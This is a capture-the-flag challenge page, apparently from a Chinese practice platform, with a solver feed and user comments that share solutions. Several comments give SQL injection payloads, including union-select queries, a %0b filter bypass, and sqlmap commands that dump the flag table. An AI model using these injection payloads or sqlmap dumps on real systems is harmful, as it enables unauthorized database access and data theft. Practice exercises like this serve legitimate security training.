评分(21)
解题动态

fengci 攻破了该题 10小时前

julianus 攻破了该题 16小时前

跃迁ctfer 攻破了该题 17小时前

shrinp 攻破了该题 19小时前

ww__ 攻破了该题 1天前

藤原家的豆腐 攻破了该题 2天前

3320981239 攻破了该题 2天前

hackerbugku 攻破了该题 3天前

13181345158 攻破了该题 3天前

FroyoCatQWQ 攻破了该题 4天前

Da1ly_1upup 攻破了该题 4天前

bertender 攻破了该题 5天前

Sshark 攻破了该题 5天前

西红柿炒番茄 攻破了该题 5天前

violetyy 攻破了该题 5天前

j0k3r 攻破了该题 5天前

lixiang12345 攻破了该题 6天前

劳动ddd卡卡 攻破了该题 7天前

18039739141 攻破了该题 7天前

评论
笨笨笨蛋 2年前
举报
有大佬用sqlmap做的吗?我想看看sqlmap怎么做这个题目
摆烂选手 2年前
举报
@charonzzw 阿巴阿巴,摆烂选手大眼瞪小眼,咋搞啊。有没有会的,哭了
theonlypopcat 2年前
举报
sqlmap --url="http://靶场地址/index.php" --data="id=1" -D skctf -T fl4g -C skctf_flag --dump
charonzzw 2年前
举报
用burp去抓包 然后copy to flie 形成txt文件,sqlmap去运行这个包 然后依次查库 表 列就出flag了
秋刀鱼の丸 2年前
举报
1' and 1=2 union select 1,2,3,skctf_flag from fl4g#
jiangyou 2年前
举报
http://t.csdn.cn/GCIkY
Hobin 2年前
举报
一个sqlmap就能完美解决
MONSTEinCAT 2年前
举报
鸡你太美
阿厂 2年前
举报
哎呦你干嘛
肥肠粉 2年前
举报
小黑子,哥哥下的蛋你别吃
Sauexceed 2年前
举报
小黑子
yemur 2年前
举报
id=-1' union select 1,2,3,skctf_flag from fl4g#
lysandria 2年前
举报
过滤了一些东西,空格用%0b绕过。payload:id=-1' union%0bselect%0bgroup_concat(skctf_flag),2,3,4%0bfrom fl4g#
15338641414 3年前
举报
输入框的sql注入
Hey0iopklh 3年前
举报
'闭合,union注入
落叶满阶红 3年前
举报
这题啊,,学了sqlmap使用方法。。自动干进去了,python2 sqlmap.py -u “URL地址” --data=”id=1” --current-db查询当前使用数据库,-D skctf(库名) --tables 查下面所有表,-T fl4g(表名)--columns列出所有的字段名,-C skctf_flag --dump列出字段内容,找到flag